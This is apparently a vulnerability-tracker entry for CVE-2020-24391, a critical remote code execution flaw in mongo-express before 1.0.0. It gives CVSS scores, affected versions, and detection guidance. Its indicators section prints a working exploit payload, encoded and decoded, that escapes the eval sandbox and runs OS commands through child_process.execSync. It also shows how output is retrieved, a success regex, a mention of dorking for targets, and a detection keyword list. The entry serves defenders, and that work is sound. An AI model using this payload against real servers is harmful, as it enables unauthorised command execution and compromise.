CVE-2020-24391
published 2021-03-30

CVE-2020-24391: mongo-express before 1.0.0 offers support for certain advanced syntax but implements this in an unsafe way. NOTE: this may overlap CVE-2019-10769.

Priority: P271 · critical · 9.8 (CVSS 3.1)
CVSS v3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: public exploit available
EPSS: 75.09% (99.4th percentile)

Affected

1 range

Vendor                  Product         Version range   Fixed in
mongo-express_project   mongo-express   <= 0.54.0       (none listed)

Detection & IOCs (extracted from sources)

url      /checkValid
path     /public/css/{{randstr}}.css
command  document=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++
         decoded `document` value (surrounding whitespace trimmed):
           (() => {
             const process = clearImmediate.constructor("return process;")();
             const result = process.mainModule.require("child_process").execSync("id > build/css/{{randstr}}.css");
             console.log("Result: " + result);
             return true;
           })()
yara     ((u|g)id|groups)=[0-9]{1,4}\([a-z0-9]+\)   (a response-body regex matcher, not a YARA rule)
  • The exploit sends a POST request to /checkValid with a URL-encoded JavaScript payload in the `document` parameter. The payload reaches the host realm's `Function` constructor through `clearImmediate.constructor`, which escapes the safer-eval sandbox, then obtains `process` and runs arbitrary OS commands via `child_process.execSync`.
  • The payload writes command output to `build/css/{{randstr}}.css` on disk, and the attacker then fetches `/public/css/{{randstr}}.css`; this retrieval step relies on mongo-express serving its build directory under the `/public` URL path. A successful RCE response body matches the regex `((u|g)id|groups)=[0-9]{1,4}\([a-z0-9]+\)` with HTTP 200.
  • Shodan, FOFA, and Google dorks can be used to identify exposed mongo-express instances as attack targets.
  • The payload is delivered with Content-Type `application/x-www-form-urlencoded` to the /checkValid endpoint. Monitor that endpoint for large or unusual `document` parameter values, in particular values containing `constructor(`, `require(`, `child_process` or `execSync`, and for subsequent GET requests to unexpected files under /public/css/.
  • The vulnerability affects mongo-express versions before 1.0.0 only (the affected range above lists releases up to 0.54.0); instances running 1.0.0 or later are not affected.
  • This CVE may overlap with CVE-2019-10769, so deduplication of alerts may be necessary in environments tracking both.

CVSS provenance

Source   Version   Score   Severity   Vector
nvd      v3.1      9.8     CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd      v2.0      7.5     HIGH       AV:N/AC:L/Au:N/C:P/I:P/A:P
ghsa               9.8     CRITICAL
osv                9.8     CRITICAL